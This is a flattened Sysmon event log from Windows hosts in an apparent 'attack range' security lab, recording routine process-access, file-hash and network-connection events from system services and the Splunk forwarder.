10:33:04.267{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284407Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:04.267{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284406Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:04.267{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284405Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:04.267{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-0D60-6216-8904-000000003802}5188C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000284404Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:04.267{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0D60-6216-8904-000000003802}5188C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000284403Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:04.268{C8EA50B7-0D60-6216-8904-000000003802}5188C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000213595Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:05.598{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BD113B83E0D37E8ACE2F24668DE2FDE,SHA256=D4914A8B20055AC33F1798FFA91BB532CF2EC862E7EBE0FCD18804E818C2BAF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284416Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:05.305{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C5CC9888C8A7E1A8BF76E882EAEB391,SHA256=2230EF3AAC6376906FF0065009BF24D2D788AD00ED4B1E468CD4D68D4BD17213,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284415Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:03.046{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53171-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000284414Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:03.046{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53171-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000284413Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:02.644{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53170-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000213596Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:06.614{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=843A35705D6A4F831C027A4A4054C33D,SHA256=D8EDE0F8C51EB1822201E0DC71E9FA9525B6E828F2F7F8B263E46EC5A9EE25FC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284417Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:06.320{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B620D7B79564DB4FCCB705FC8D138654,SHA256=7EF28B5D2ED93581DB88F4D0EAAE337E57B7808515D74947117C3B86A52BD192,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213597Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:07.614{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=749EF04AE8530265F0F33439654460A6,SHA256=FC503228F9BE23FC38765A8ECEF79A628599C12433DB6D1B82EB521732244CE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284418Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:07.352{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59B641F1C45AFAED5765C58D963E1030,SHA256=3BC8A09608942EFDB49A75056A76851070D62AC0E3CABC8C74D1DFDD59CF59E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213599Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:08.629{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1D97881720F5B012A3744BFA28C21C6,SHA256=E1A7705A32EFAF4DE86BD6B25FAB05CC469028BA605557C46B854B655B2BFB16,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284419Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:08.383{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57C9E358754FFCF9EC3BE1B0E8A1ED59,SHA256=B057B205B762D17B6D3E65BECB608A681ABD9809EB11D775002AFB643952C7F3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213598Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:04.643{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51131-false10.0.1.12-8000- 23542300x8000000000000000213600Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:09.645{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E29ACC3E54C20203AFE93AFD2DBA5AB,SHA256=E4B04A4C606FF278062DEAD03DFC846EF5A9EC7E95834AB2DB6EECEF7A7C99A3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284420Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:09.436{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA60036E1069536C846B6283F11DD3AB,SHA256=09655B3985A4AB667A444A46690E00DFEF9B4C076B3E393DF64A9EDE99B06D55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213601Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:10.754{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1F1B49D6FC16038DA15CE526AC6F78D,SHA256=C214D38A4B830CC9EDA718CBFD77CA350B0D26C81C07C4A9ED4B4BB93D80572B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284422Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:10.451{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7488A3205C2CD8EE18E95EB4BEA44D5D,SHA256=488A50070C1472B39B4589CAD98CF66648C92ACC1E1C1FF5BB6BA5083894BF86,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284421Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:07.730{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53172-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000213602Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:11.832{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA8843099BF5BB1BCC87989FB97F139A,SHA256=1C789B2E6D656FE3032E998695A1068EFDCC15021E2D0964D7D5E873064DBD5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284423Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:11.451{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FD3669352E4EA4F9647BB4D66F34A96,SHA256=105F61BE2F382F2193AAA9B4A2AFFFFB79CCD6C95B14F2312834D37F3A02B879,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284424Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:12.466{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F33D18B14B22A444FCECDF792728AF1,SHA256=10ADA8A1EE48D9A94455B58A08914C3547306CC5D7338D1317F0BD3ECDA785E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213603Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:10.628{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51132-false10.0.1.12-8000- 23542300x8000000000000000284425Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:13.500{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=156E472F676ECF39BA541A84226BFA0F,SHA256=1D589BCF1C8A6789D223232929C72E70DBE7ACA49E45EC6D98CB3A94655E903A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213604Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:13.051{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94F67B23FF63FDC035471751CF8D1F3E,SHA256=1FC700902AB5ED3E66FE53FAF75B243DBABF88D47395DEF27782F16D88BEEF1D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284426Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:14.518{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99D1CDBE504843ADE2B31438CB6E1458,SHA256=64BDFE999C5A6E93BB69C31D6AF234C2F14E660E19F29D0D8D1A983EA7361340,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213605Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:14.285{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4D5A2396832BE32F70F5DE133E6F3C3A,SHA256=45D9925AF5DED69736093D0B7855A7147B4685CD4AA9A17A897C1B1316F30058,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213606Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:15.520{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B70DDBF96C684D8020A93D3A25699646,SHA256=2771FF3DDDE5B1B4AA79EEB9111CB689981279E7EE490BE5ACA0B5279E04B361,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284427Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:15.538{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=463BB897549F03ABEE6AD16DBB2AEFEF,SHA256=F2B30107D6892DDDF8008BA039638F9117E9D3B0D24DF6D7A91872AD0C04AA28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213607Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:16.613{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCB69A5382FBFA8B1D336A87265368EA,SHA256=0B12E21D71C969A7C8FE6BB3DAA13DA5F712254CC7DC0389CC47C5A010757D9A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284429Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:16.538{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1C82E724323548AE8D118D6FD031286F,SHA256=181D82978EAB5237E565C1C131B12A7C9CA7DB4213A470CAA170926DA38DA43A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284428Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:13.712{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53173-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000284430Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:17.568{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C34C064DD8CFC49308B3E44ADFCD7B4E,SHA256=22D05F69E37F05765A9ECD57B4C65B2C9CBE751025E2B0D0FCDA0E9C4E250102,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213608Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:17.645{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C7ABE88C037B2C76ABD749EFADFC463B,SHA256=2D9E1AA177E22A947A0597677B9E9568421DE9F7A23501B06A6A1EA464DE578D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284431Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:18.605{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7083A44DEB8113AABC0130569F0CD3ED,SHA256=E4A5649473347E8154310F44C0975570C2A4B3F96B279BA135A0A2BC743FFA0C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213609Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:33:18.645{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86A46DE1AE06CB8349F3CA73D18DB200,SHA256=7D9CCEB818BEDE91E0F563B245D069964C82F15A5466C2BA333C7C9EFA17F79A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000284440Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:19.767{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0D6F-6216-8A04-000000003802}4496C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284439Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:19.767{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284438Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:33:19.767{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000284437Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 